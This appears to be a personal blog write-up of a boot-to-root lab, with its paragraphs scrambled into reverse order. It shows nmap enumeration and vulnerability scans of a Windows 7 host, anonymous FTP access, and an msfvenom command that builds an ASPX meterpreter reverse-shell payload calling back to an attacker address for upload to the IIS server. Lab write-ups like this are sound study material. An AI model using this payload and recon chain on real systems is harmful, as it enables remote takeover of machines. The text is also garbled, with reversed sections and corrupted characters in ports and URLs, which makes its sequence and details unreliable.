No encoder or badchars specified, outputting raw payload No Arch selected, selecting Arch: x86 from the payload No platform was selected, choosing Msf::Module::Platform::Windows from the payload Create an ASPX reverse shell payload using MSFVenom ⌗ msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=192.168.0.99 LPORT=4444 -o rshell.aspx Verify this by visiting http:192.168.0.102/hello.aspx in a browser. It looks like the web server (IIS on Windows) is configured to run aspx (ASP.NET) server side code. Exploitation ⌗ Anonymous FTP - test login ⌗ ftp 192.168.0.102ġ50 Opening data channel for directory listing of "/" Nmap done: 1 IP address (1 host up) scanned in 201.12 secondsĭamn, no remote code execution vulnerablities, but lots of services to dig into. |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED | the http server's resources causing Denial Of Service. | the target web server and sending a partial request. It accomplishes this by opening connections to | Slowloris tries to keep many connections to the target web server open and hold ![]() |_ /docs/: Potentially interesting folder | /manager/html: Apache Tomcat (401 Unauthorized) | /manager/html/upload: Apache Tomcat (401 Unauthorized) | Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 | shared groups, may be susceptible to passive eavesdropping attacks. | of insufficient strength, especially those using one of a few commonly | Transport Layer Security (TLS) services that use Diffie-Hellman groups | Diffie-Hellman Key Exchange Insufficient Group Strength |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. Vulnerabilities scan Results ⌗ nmap -script vuln 192.168.0.102 Nmap done: 1 IP address (1 host up) scanned in 148.76 seconds |_ Message signing enabled but not required |_ message_signing: disabled (dangerous, but default) | OS CPE: cpe:/o:microsoft:windows_7::sp1 ![]() | OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1) Service Info: Host: IE11WIN7 OS: Windows CPE: cpe:/o:microsoft:windows No exact OS matches for host (If you know what OS is running on it, see ). ![]() |_http-open-proxy: Proxy might be redirecting requestsĤ9152/tcp open msrpc Microsoft Windows RPCĤ9153/tcp open msrpc Microsoft Windows RPCĤ9154/tcp open msrpc Microsoft Windows RPCĤ9155/tcp open msrpc Microsoft Windows RPCĤ9156/tcp open msrpc Microsoft Windows RPCĤ9157/tcp open msrpc Microsoft Windows RPC |_ajp-methods: Failed to get a valid response for the OPTION requestĨ080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-title: Site doesn't have a title (text/html).ġ39/tcp open netbios-ssn Microsoft Windows netbios-ssnĤ45/tcp open microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)ģ389/tcp open ms-wbt-server Microsoft Terminal Service | ftp-anon: Anonymous FTP login allowed (FTP code 230) What services are running? ⌗ nmap -A -sV 192.168.0.102 The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. Historically, Apache has been much faster than Tomcat at serving static content. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Nmap done: 1 IP address (1 host up) scanned in 66.26 secondsĪ Windows box, running a bunch of services like ftp, two http servers, smb and ajp.ĪJP is a wire protocol. OS details: Microsoft Windows Server 2008 R2 SP1, Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_vista::sp1:home_premium cpe:/o:microsoft:windows_7 Enumeration ⌗ OS Fingerprint ⌗ nmap -O 192.168.0.102 Some fun I hacking on a boot to root challenge I did with a mate recently.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |